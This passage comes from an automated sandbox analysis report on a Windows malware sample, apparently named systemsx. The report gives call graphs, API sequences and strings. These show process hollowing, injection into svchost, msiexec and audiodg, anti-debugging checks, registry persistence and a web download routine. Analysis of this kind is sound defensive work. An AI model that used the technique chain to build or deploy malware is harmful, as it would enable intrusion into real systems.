GetProcAddress 1031->1268 1033 7ff79483154a 1269 7ff794831050 LoadLibraryA GetProcAddress 1033->1269 1035 7ff794831564 1270 7ff794831050 LoadLibraryA GetProcAddress 1035->1270 1037 7ff79483157e 1271 7ff794831050 LoadLibraryA GetProcAddress 1037->1271 1039 7ff794831598 1272 7ff794831050 LoadLibraryA GetProcAddress 1039->1272 1041 7ff7948315b2 1273 7ff794831050 LoadLibraryA GetProcAddress 1041->1273 1043 7ff7948315cc 1274 7ff794831050 LoadLibraryA GetProcAddress 1043->1274 1045 7ff7948315e6 1275 7ff794831050 LoadLibraryA GetProcAddress 1045->1275 1047 7ff794831600 1276 7ff794831050 LoadLibraryA GetProcAddress 1047->1276 1049 7ff79483161a 1277 7ff794831050 LoadLibraryA GetProcAddress 1049->1277 1051 7ff794831634 1278 7ff794831050 LoadLibraryA GetProcAddress 1051->1278 1053 7ff79483164e 1279 7ff794831050 LoadLibraryA GetProcAddress 1053->1279 1055 7ff794831668 1280 7ff794831050 LoadLibraryA GetProcAddress 1055->1280 1057 7ff794831682 1281 7ff794831050 LoadLibraryA GetProcAddress 1057->1281 1059 7ff79483169c 1282 7ff794831050 LoadLibraryA GetProcAddress 1059->1282 1061 7ff7948316b6 1283 7ff794831050 LoadLibraryA GetProcAddress 1061->1283 1063 7ff7948316d0 1284 7ff794831050 LoadLibraryA GetProcAddress 1063->1284 1065 7ff7948316ea 1285 7ff794831050 LoadLibraryA GetProcAddress 1065->1285 1067 7ff794831704 1286 7ff794831050 LoadLibraryA GetProcAddress 1067->1286 1069 7ff79483171e 1287 7ff794831050 LoadLibraryA GetProcAddress 1069->1287 1071 7ff794831738 1288 7ff794831050 LoadLibraryA GetProcAddress 1071->1288 1073 7ff794831752 1289 7ff794831050 LoadLibraryA GetProcAddress 1073->1289 1075 7ff79483176c 1290 7ff794831050 LoadLibraryA GetProcAddress 1075->1290 1077 7ff794831786 1291 7ff794831050 LoadLibraryA GetProcAddress 1077->1291 1079 7ff7948317a0 1292 7ff794831050 LoadLibraryA GetProcAddress 1079->1292 1081 7ff7948317ba 1293 7ff794831050 LoadLibraryA GetProcAddress 1081->1293 1083 7ff7948317d4 1294 7ff794831050 LoadLibraryA GetProcAddress 1083->1294 1085 7ff7948317ee 1295 7ff794831050 LoadLibraryA GetProcAddress 1085->1295 1087 7ff794831808 1296 7ff794831050 LoadLibraryA GetProcAddress 1087->1296 1089 7ff794831822 1297 7ff794831050 LoadLibraryA GetProcAddress 1089->1297 1091 7ff79483183c 1298 7ff794831050 LoadLibraryA GetProcAddress 1091->1298 1093 7ff794831856 1299 7ff794831050 LoadLibraryA GetProcAddress 1093->1299 1095 7ff794831870 1300 7ff794831050 LoadLibraryA GetProcAddress 1095->1300 1097 7ff79483188a 1301 7ff794831050 LoadLibraryA GetProcAddress 1097->1301 1099 7ff7948318a4 1302 7ff794831050 LoadLibraryA GetProcAddress 1099->1302 1101 7ff7948318be 1303 7ff794831050 LoadLibraryA GetProcAddress 1101->1303 1103 7ff7948318d8 1304 7ff794831050 LoadLibraryA GetProcAddress 1103->1304 1105 7ff7948318f2 1305 7ff794831050 LoadLibraryA GetProcAddress 1105->1305 1107 7ff79483190c 1306 7ff794831050 LoadLibraryA GetProcAddress 1107->1306 1109 7ff794831926 1307 7ff794831050 LoadLibraryA GetProcAddress 1109->1307 1111 7ff794831940 1308 7ff794831050 LoadLibraryA GetProcAddress 1111->1308 1113 7ff79483195a 1309 7ff794831050 LoadLibraryA GetProcAddress 1113->1309 1115 7ff794831974 1310 7ff794831050 LoadLibraryA GetProcAddress 1115->1310 1117 7ff79483198e 1311 7ff794831050 LoadLibraryA GetProcAddress 1117->1311 1119 7ff7948319a8 1312 7ff794831050 LoadLibraryA GetProcAddress 1119->1312 1121 7ff7948319c2 1313 7ff794831050 LoadLibraryA GetProcAddress 1121->1313 1123 7ff7948319dc 1314 7ff794831050 LoadLibraryA GetProcAddress 1123->1314 1125 7ff7948319f6 1315 7ff794831050 LoadLibraryA GetProcAddress 1125->1315 1127 7ff794831a10 1316 7ff794831050 LoadLibraryA GetProcAddress 1127->1316 1129 7ff794831a2a 1317 7ff794831050 LoadLibraryA GetProcAddress 1129->1317 1131 7ff794831a44 1318 7ff794831050 LoadLibraryA GetProcAddress 1131->1318 1133 7ff794831a5e 1319 7ff794831050 LoadLibraryA GetProcAddress 1133->1319 1135 7ff794831a78 1320 7ff794831050 LoadLibraryA GetProcAddress 1135->1320 1137 7ff794831a92 1321 7ff794831050 LoadLibraryA GetProcAddress 1137->1321 1139 7ff794831aac 1322 7ff794831050 LoadLibraryA GetProcAddress 1139->1322 1141 7ff794831ac6 1323 7ff794831050 LoadLibraryA GetProcAddress 1141->1323 1143 7ff794831ae0 1324 7ff794831050 LoadLibraryA GetProcAddress 1143->1324 1145 7ff794831afa 1325 7ff794831050 LoadLibraryA GetProcAddress 1145->1325 1147 7ff794831b14 1326 7ff794831050 LoadLibraryA GetProcAddress 1147->1326 1149 7ff794831b2e 1327 7ff794831000 LoadLibraryA GetProcAddress 1149->1327 1151 7ff794831b48 1328 7ff794831050 LoadLibraryA GetProcAddress 1151->1328 1153 7ff794831b62 1329 7ff794831050 LoadLibraryA GetProcAddress 1153->1329 1155 7ff794831b7c 1330 7ff794831050 LoadLibraryA GetProcAddress 1155->1330 1157 7ff794831b96 1331 7ff794831050 LoadLibraryA GetProcAddress 1157->1331 1159 7ff794831bb0 1332 7ff794831050 LoadLibraryA GetProcAddress 1159->1332 1161 7ff794831bca 1333 7ff794831050 LoadLibraryA GetProcAddress 1161->1333 1163 7ff794831be4 1334 7ff794831050 LoadLibraryA GetProcAddress 1163->1334 1165 7ff794831bfe 1335 7ff794831000 LoadLibraryA GetProcAddress 1165->1335 1167 7ff794831c18 1336 7ff794831000 LoadLibraryA GetProcAddress 1167->1336 1169 7ff794831c32 1337 7ff794831050 LoadLibraryA GetProcAddress 1169->1337 1171 7ff794831c4c 1338 7ff794831050 LoadLibraryA GetProcAddress 1171->1338 1173 7ff794831c66 1339 7ff794831050 LoadLibraryA GetProcAddress 1173->1339 1175 7ff794831c80 1340 7ff794831050 LoadLibraryA GetProcAddress 1175->1340 1177 7ff794831c9a 1341 7ff794831050 LoadLibraryA GetProcAddress 1177->1341 1179 7ff794831cb4 1342 7ff794831050 LoadLibraryA GetProcAddress 1179->1342 1181 7ff794831cce 1182 7ff79483321c IsDebuggerPresent 1181->1182 1183 7ff79483322e GetCurrentProcess CheckRemoteDebuggerPresent 1182->1183 1184 7ff79483322a 1182->1184 1183->1184 1184->895 1184->896 1186 7ff79483428a GetTokenInformation 1185->1186 1187 7ff794833481 1185->1187 1343 7ff794833b54 VirtualAlloc 1186->1343 1196 7ff794833ce4 GetModuleFileNameW 1187->1196 1189 7ff7948342bb GetTokenInformation 1190 7ff7948342e8 CloseHandle 1189->1190 1192 7ff794834302 AdjustTokenPrivileges CloseHandle 1189->1192 1191 7ff794833b24 VirtualFree 1190->1191 1193 7ff7948342fd 1191->1193 1344 7ff794833b24 1192->1344 1193->1187 1197 7ff794833dd2 wcsncpy 1196->1197 1198 7ff794833d0f PathFindFileNameW wcslen 1196->1198 1199 7ff794833d49 1197->1199 1198->1199 1199->900 1201 7ff79483356d 1200->1201 1202 7ff7948343d0 GetLastError 1200->1202 1201->926 1201->927 1202->1201 1203 7ff7948343dd CloseHandle 1202->1203 1203->1201 1347 7ff7948338c4 1204->1347 1206 7ff79483328c 1350 7ff7948344b4 CreateFileW 1206->1350 1210 7ff794833744 3 API calls 1209->1210 1211 7ff794833a9f 1210->1211 1212 7ff7948338c4 11 API calls 1211->1212 1213 7ff794833aa9 GetModuleFileNameW DeleteFileW CopyFileW 1212->1213 1214 7ff7948335a7 1213->1214 1215 7ff794833aeb SetFileAttributesW 1213->1215 1217 7ff7948333ec GetVersionExW 1214->1217 1367 7ff7948339b4 RegOpenKeyExW 1215->1367 1218 7ff79483341d 1217->1218 1218->936 1218->937 1220 7ff7948338c4 11 API calls 1219->1220 1221 7ff7948332fd 1220->1221 1370 7ff7948346e4 CreateFileW 1221->1370 1223 7ff794833357 CreateThread 1223->924 1224 7ff794833315 1224->1223 1382 7ff7948340c4 1224->1382 1228->953 1229->955 1230->957 1231->959 1232->961 1233->963 1234->965 1235->967 1236->969 1237->971 1238->973 1239->975 1240->977 1241->979 1242->981 1243->983 1244->985 1245->987 1246->989 1247->991 1248->993 1249->995 1250->997 1251->999 1252->1001 1253->1003 1254->1005 1255->1007 1256->1009 1257->1011 1258->1013 1259->1015 1260->1017 1261->1019 1262->1021 1263->1023 1264->1025 1265->1027 1266->1029 1267->1031 1268->1033 1269->1035 1270->1037 1271->1039 1272->1041 1273->1043 1274->1045 1275->1047 1276->1049 1277->1051 1278->1053 1279->1055 1280->1057 1281->1059 1282->1061 1283->1063 1284->1065 1285->1067 1286->1069 1287->1071 1288->1073 1289->1075 1290->1077 1291->1079 1292->1081 1293->1083 1294->1085 1295->1087 1296->1089 1297->1091 1298->1093 1299->1095 1300->1097 1301->1099 1302->1101 1303->1103 1304->1105 1305->1107 1306->1109 1307->1111 1308->1113 1309->1115 1310->1117 1311->1119 1312->1121 1313->1123 1314->1125 1315->1127 1316->1129 1317->1131 1318->1133 1319->1135 1320->1137 1321->1139 1322->1141 1323->1143 1324->1145 1325->1147 1326->1149 1327->1151 1328->1153 1329->1155 1330->1157 1331->1159 1332->1161 1333->1163 1334->1165 1335->1167 1336->1169 1337->1171 1338->1173 1339->1175 1340->1177 1341->1179 1342->1181 1343->1189 1345 7ff794833b48 1344->1345 1346 7ff794833b35 VirtualFree 1344->1346 1345->1187 1346->1345 1356 7ff794833744 GetWindowsDirectoryW 1347->1356 1349 7ff7948338f3 8 API calls 1349->1206 1351 7ff79483450a 1350->1351 1352 7ff79483452b GetLastError 1350->1352 1361 7ff794834404 GetFileSize 1351->1361 1354 7ff79483329f CreateThread Sleep 1352->1354 1354->935 1357 7ff794833798 GetVolumeInformationW 1356->1357 1358 7ff79483378e 1356->1358 1359 7ff794833814 1357->1359 1358->1357 1360 7ff79483387e wsprintfW 1359->1360 1360->1349 1366 7ff794833b54 VirtualAlloc 1361->1366 1363 7ff794834430 1364 7ff79483447a CloseHandle 1363->1364 1365 7ff794834444 SetFilePointer ReadFile 1363->1365 1364->1354 1365->1364 1366->1363 1368 7ff7948339f9 RegSetValueExW RegCloseKey 1367->1368 1369 7ff7948339f5 1367->1369 1368->1369 1369->1214 1371 7ff79483473e 1370->1371 1372 7ff794834745 GetFileSize GetProcessHeap RtlAllocateHeap 1370->1372 1371->1224 1373 7ff79483478e CloseHandle 1372->1373 1374 7ff7948347a0 ReadFile 1372->1374 1373->1371 1375 7ff7948347c7 GetProcessHeap HeapFree CloseHandle 1374->1375 1376 7ff7948347ef 1374->1376 1375->1371 1377 7ff794834808 GetProcessHeap HeapFree CloseHandle 1376->1377 1381 7ff794834830 1376->1381 1377->1371 1378 7ff79483499b GetProcessHeap HeapFree CloseHandle 1378->1371 1379 7ff7948348eb GetProcessHeap RtlAllocateHeap 1380 7ff794834934 1379->1380 1380->1378 1381->1378 1381->1379 1397 7ff794834004 CreateToolhelp32Snapshot 1382->1397 1385 7ff7948340e4 1386 7ff79483414b GetCurrentProcess OpenProcessToken 1385->1386 1387 7ff794834168 LookupPrivilegeValueW 1386->1387 1388 7ff7948341c2 OpenProcess 1386->1388 1389 7ff7948341b7 CloseHandle 1387->1389 1390 7ff794834190 AdjustTokenPrivileges 1387->1390 1391 7ff7948341ee 1388->1391 1392 7ff7948341e4 1388->1392 1389->1388 1390->1389 1391->1392 1396 7ff794834222 WaitForSingleObject 1391->1396 1404 7ff794832cb8 1391->1404 1394 7ff79483424f 1392->1394 1395 7ff794834244 CloseHandle 1392->1395 1394->1223 1395->1394 1396->1386 1396->1392 1398 7ff794833342 1397->1398 1399 7ff79483403f Process32FirstW 1397->1399 1398->1385 1400 7ff794834099 CloseHandle 1399->1400 1401 7ff79483405e wcscmp 1399->1401 1400->1398 1402 7ff794834082 Process32NextW 1401->1402 1403 7ff794834075 1401->1403 1402->1400 1402->1401 1403->1400 1405 7ff794832d0b 1404->1405 1407 7ff794832d2b 1405->1407 1408 7ff794832d4d VirtualAllocEx 1405->1408 1412 7ff794832a88 1405->1412 1407->1391 1408->1407 1409 7ff794832d87 WriteProcessMemory 1408->1409 1409->1407 1410 7ff794832dd0 VirtualProtectEx 1409->1410 1410->1407 1411 7ff794832e03 CreateRemoteThread 1410->1411 1411->1405 1411->1407 1413 7ff794832b01 1412->1413 1414 7ff794832c0a StrStrA 1413->1414 1415 7ff794832b08 1413->1415 1414->1413 1414->1415 1415->1405 1419 7ff794832f9c 1420 7ff7948338c4 11 API calls 1419->1420 1421 7ff794832fdb 1420->1421 1422 7ff7948346e4 17 API calls 1421->1422 1423 7ff794832fff 1422->1423 1424 7ff7948340c4 5 API calls 1423->1424 1425 7ff794833022 1424->1425 1426 7ff7948340e4 13 API calls 1425->1426 1427 7ff794833037 GetProcessHeap HeapFree 1426->1427 1444 7ff794831cdc 1445 7ff794831d06 InternetOpenW 1444->1445 1446 7ff794831d40 InternetOpenUrlW 1445->1446 1447 7ff794831d33 Sleep 1445->1447 1448 7ff794831dc9 HttpQueryInfoA 1446->1448 1449 7ff794831d77 InternetOpenUrlW 1446->1449 1447->1445 1451 7ff794831df8 InternetCloseHandle InternetCloseHandle Sleep 1448->1451 1452 7ff794831e1e 1448->1452 1449->1448 1450 7ff794831dae InternetCloseHandle Sleep 1449->1450 1450->1445 1451->1445 1453 7ff794831e28 InternetCloseHandle InternetOpenUrlW 1452->1453 1454 7ff794831e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1452->1454 1453->1454 1455 7ff794831e6a InternetCloseHandle Sleep 1453->1455 1456 7ff794831eea InternetCloseHandle InternetCloseHandle 1454->1456 1460 7ff794831f04 1454->1460 1455->1445 1457 7ff794831f83 1456->1457 1458 7ff794831f0c InternetReadFile 1459 7ff794831f5a InternetCloseHandle InternetCloseHandle 1458->1459 1458->1460 1459->1457 1460->1458 1460->1459 1461 7ff7948330dc 1466 7ff7948330e5 1461->1466 1462 7ff7948331d1 1465 7ff794833c24 RegDeleteKeyW 1465->1466 1466->1462 1466->1465 1467 7ff794833e24 9 API calls 1466->1467 1468 7ff7948339b4 3 API calls 1466->1468 1470 7ff7948345c4 CreateFileW 1466->1470 1475 7ff794833b84 RegOpenKeyExW 1466->1475 1467->1466 1469 7ff7948331c1 Sleep 1468->1469 1469->1466 1471 7ff79483465a 1470->1471 1472 7ff79483461f 1470->1472 1471->1466 1478 7ff794834544 SetFilePointer WriteFile SetEndOfFile 1472->1478 1474 7ff79483463b SetFileAttributesW CloseHandle 1474->1471 1476 7ff794833bd8 RegSetValueExW RegCloseKey 1475->1476 1477 7ff794833c12 1475->1477 1476->1477 1477->1466 1478->1474

                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                          callgraph 0 Function_00007FF79483BEAD 1 Function_00007FF7948333AC 69 Function_00007FF794832048 1->69 2 Function_00007FF7948344B4 61 Function_00007FF794834404 2->61 3 Function_00007FF7948339B4 4 Function_00007FF79483E999 5 Function_00007FF79483E997 6 Function_00007FF79483359D 7 Function_00007FF794832F9C 22 Function_00007FF7948340C4 7->22 23 Function_00007FF7948338C4 7->23 39 Function_00007FF7948346E4 7->39 41 Function_00007FF7948340E4 7->41 100 Function_00007FF794833C64 7->100 8 Function_00007FF79483E99B 9 Function_00007FF7948310A0 58 Function_00007FF794831000 9->58 72 Function_00007FF794831050 9->72 10 Function_00007FF7948343A4 11 Function_00007FF794831FC8 12 Function_00007FF7948333CC 12->69 13 Function_00007FF79483C9CB 14 Function_00007FF79483A2D0 15 Function_00007FF79483D8B8 16 Function_00007FF794832CB8 102 Function_00007FF794832A88 16->102 17 Function_00007FF79483EBBE 18 Function_00007FF79483DCC2 19 Function_00007FF79483DEC1 20 Function_00007FF79483D0C4 21 Function_00007FF7948345C4 80 Function_00007FF794834544 21->80 60 Function_00007FF794834004 22->60 79 Function_00007FF794833744 23->79 24 Function_00007FF7948336EC 25 Function_00007FF7948331EC 82 Function_00007FF79483306C 25->82 26 Function_00007FF7948332EC 26->22 26->23 26->39 26->41 26->100 27 Function_00007FF7948333EC 28 Function_00007FF79483ABF2 29 Function_00007FF79483BCF1 30 Function_00007FF79483C2F5 31 Function_00007FF79483B2F4 32 Function_00007FF79483E8F3 33 Function_00007FF79483B3DA 34 Function_00007FF79483EFD8 35 Function_00007FF7948336D8 36 Function_00007FF79483A0DD 37 Function_00007FF794831CDC 38 Function_00007FF7948330DC 38->3 38->21 67 Function_00007FF794833C24 38->67 68 Function_00007FF794833E24 38->68 112 Function_00007FF794833B84 38->112 87 Function_00007FF794834674 39->87 40 Function_00007FF794833CE4 41->16 42 Function_00007FF794833609 43 Function_00007FF79483B508 44 Function_00007FF79483E008 45 Function_00007FF794832008 46 Function_00007FF794832F0C 47 Function_00007FF79483D615 48 Function_00007FF79483D915 49 Function_00007FF794833F14 50 Function_00007FF794833714 51 Function_00007FF79483ABF9 52 Function_00007FF79483C2F9 53 Function_00007FF79483ABF7 54 Function_00007FF79483C2F7 55 Function_00007FF7948336FC 56 Function_00007FF79483ABFB 57 Function_00007FF79483C501 59 Function_00007FF79483D904 75 Function_00007FF794833B54 61->75 62 Function_00007FF79483F232 63 Function_00007FF79483C91A 64 Function_00007FF79483D91D 65 Function_00007FF79483321C 66 Function_00007FF794833B24 69->11 69->45 103 Function_00007FF794831F88 69->103 70 Function_00007FF79483A04E 71 Function_00007FF79483A052 73 Function_00007FF79483DC55 74 Function_00007FF79483CD54 76 Function_00007FF79483D339 77 Function_00007FF79483D33F 78 Function_00007FF79483DC46 79->50 81 Function_00007FF794832E6C 82->81 83 Function_00007FF79483A772 84 Function_00007FF79483DE70 85 Function_00007FF79483A776 86 Function_00007FF794833A74 86->3 86->23 86->79 88 Function_00007FF79483C673 89 Function_00007FF79483A05A 90 Function_00007FF79483DE59 91 Function_00007FF79483A258 92 Function_00007FF79483C65C 93 Function_00007FF79483345C 93->9 93->10 93->26 93->27 93->40 93->49 93->65 93->86 99 Function_00007FF794834264 93->99 109 Function_00007FF79483327C 93->109 94 Function_00007FF79483A061 95 Function_00007FF79483D361 96 Function_00007FF79483B15F 97 Function_00007FF79483CF65 98 Function_00007FF79483D365 99->66 99->75 101 Function_00007FF79483A188 108 Function_00007FF794832978 102->108 104 Function_00007FF79483338C 104->69 105 Function_00007FF79483EF92 106 Function_00007FF79483A778 107 Function_00007FF79483F278 109->2 109->23 110 Function_00007FF79483F281 111 Function_00007FF79483A27F

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FF794832048 Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 231 7ff794832048-7ff7948320c2 GetModuleFileNameW 232 7ff7948320c9-7ff794832105 231->232 233 7ff7948320c4 231->233 235 7ff794832107-7ff79483210f 232->235 236 7ff79483211d-7ff794832139 call 7ff794831f88 232->236 234 7ff79483296d-7ff794832975 233->234 237 7ff79483213b-7ff794832157 call 7ff794831fc8 235->237 238 7ff794832111-7ff794832119 235->238 247 7ff79483217c-7ff794832186 236->247 237->247 240 7ff794832159-7ff794832175 call 7ff794832008 238->240 241 7ff79483211b-7ff794832177 238->241 240->247 241->234 249 7ff794832188 247->249 250 7ff79483218d-7ff7948321e1 CreateProcessW 247->250 249->234 251 7ff7948321e8-7ff794832228 CreateFileW 250->251 252 7ff7948321e3 250->252 253 7ff79483222a 251->253 254 7ff79483222f-7ff79483224b GetFileSize 251->254 252->234 253->234 255 7ff794832257-7ff794832262 CloseHandle 254->255 256 7ff79483224d-7ff794832255 254->256 255->234 256->255 257 7ff794832267-7ff79483228f VirtualAlloc 256->257 258 7ff7948322a1-7ff7948322cc ReadFile 257->258 259 7ff794832291-7ff79483229c CloseHandle 257->259 260 7ff7948322ce-7ff7948322ec VirtualFree CloseHandle 258->260 261 7ff7948322f1-7ff79483233f CloseHandle GetThreadContext 258->261 259->234 260->234 262 7ff794832359-7ff7948323de ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->262 263 7ff794832341-7ff794832354 VirtualFree 261->263 264 7ff7948323f8-7ff794832461 VirtualAllocEx 262->264 265 7ff7948323e0-7ff7948323f3 VirtualFree 262->265 263->234 266 7ff79483247b-7ff7948324af WriteProcessMemory 264->266 267 7ff794832463-7ff794832476 VirtualFree 264->267 265->234 268 7ff7948324c9-7ff7948324d4 266->268 269 7ff7948324b1-7ff7948324c4 VirtualFree 266->269 267->234 270 7ff7948324e6-7ff7948324f9 268->270 269->234 271 7ff7948325a7-7ff7948325ee 270->271 272 7ff7948324ff-7ff794832588 WriteProcessMemory 270->272 273 7ff794832600-7ff794832613 271->273 274 7ff79483258a-7ff79483259d VirtualFree 272->274 275 7ff7948325a2 272->275 277 7ff794832619-7ff794832668 RtlCompareMemory 273->277 278 7ff794832898-7ff79483291c WriteProcessMemory SetThreadContext 273->278 274->234 275->270 279 7ff79483266a 277->279 280 7ff79483266c-7ff794832695 277->280 281 7ff79483291e-7ff794832931 VirtualFree 278->281 282 7ff794832933-7ff794832943 ResumeThread 278->282 279->273 284 7ff7948326a0-7ff7948326ae 280->284 281->234 285 7ff79483295a-7ff794832967 VirtualFree 282->285 286 7ff794832945-7ff794832958 VirtualFree 282->286 287 7ff794832893 284->287 288 7ff7948326b4-7ff79483273f 284->288 285->234 286->234 287->278 289 7ff794832751-7ff79483275f 288->289 290 7ff79483288e 289->290 291 7ff794832765-7ff794832798 289->291 290->284 292 7ff79483279a 291->292 293 7ff79483279c-7ff79483286f ReadProcessMemory WriteProcessMemory 291->293 292->289 295 7ff794832889 293->295 296 7ff794832871-7ff794832884 VirtualFree 293->296 295->290 296->234
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581
                                                                                                                                                                                                                          • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction ID: 9f43c6d956b3b94b252bf42de329de0afb9291d0868d008d58f0830043faacea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E832DA32608AC586D775DF26E894BAAB3A1FB89B84F408135DA8D83B58DF7CD454CB10
                                                                                                                                                                                                                          Function 00007FF79483345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 297 7ff79483345c-7ff794833472 call 7ff7948310a0 call 7ff79483321c 302 7ff79483347c-7ff7948334aa call 7ff794834264 call 7ff794833ce4 call 7ff794833f14 297->302 303 7ff794833474-7ff794833476 ExitProcess 297->303 310 7ff7948334fb-7ff79483350e call 7ff794833f14 302->310 311 7ff7948334ac-7ff7948334bd call 7ff7948343a4 302->311 316 7ff79483354c-7ff79483355f call 7ff794833f14 310->316 317 7ff794833510-7ff794833521 call 7ff7948343a4 310->317 318 7ff7948334d2-7ff7948334d4 ExitProcess 311->318 319 7ff7948334bf-7ff7948334d0 call 7ff7948343a4 311->319 329 7ff794833561-7ff794833572 call 7ff7948343a4 316->329 330 7ff7948335a2-7ff7948335b8 call 7ff794833a74 call 7ff7948333ec 316->330 326 7ff79483352b call 7ff79483327c 317->326 327 7ff794833523-7ff794833525 ExitProcess 317->327 319->318 328 7ff7948334da call 7ff7948332ec 319->328 335 7ff794833530-7ff794833535 326->335 337 7ff7948334df-7ff7948334e4 328->337 339 7ff79483357c call 7ff79483327c 329->339 340 7ff794833574-7ff794833576 ExitProcess 329->340 349 7ff7948335ba-7ff7948335cb call 7ff7948343a4 330->349 350 7ff79483360e-7ff7948336d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 330->350 341 7ff794833537-7ff794833542 Sleep 335->341 342 7ff794833544-7ff794833546 ExitProcess 335->342 344 7ff7948334e6-7ff7948334f1 Sleep 337->344 345 7ff7948334f3-7ff7948334f5 ExitProcess 337->345 348 7ff794833581-7ff794833586 339->348 341->335 344->337 351 7ff794833588-7ff794833593 Sleep 348->351 352 7ff794833595-7ff794833597 ExitProcess 348->352 355 7ff7948335cd-7ff7948335de call 7ff7948343a4 349->355 356 7ff7948335e0-7ff7948335e2 ExitProcess 349->356 351->348 355->356 359 7ff7948335e8 call 7ff7948332ec 355->359 361 7ff7948335ed-7ff7948335f2 359->361 362 7ff794833601-7ff794833603 ExitProcess 361->362 363 7ff7948335f4-7ff7948335ff Sleep 361->363 363->361
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                          • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                          • API String ID: 613740775-1953711635
                                                                                                                                                                                                                          • Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                                          • Instruction ID: 05c0c8ca37b56c8e3f512574f6f693402bcb2dd748248f4fd1138ff8506d93b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6661D931A18A4391EA74BF76A8D5A7AA260BF84701FC0C535D44E871E5DE2DE865C730
                                                                                                                                                                                                                          Function 00007FF794834264 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
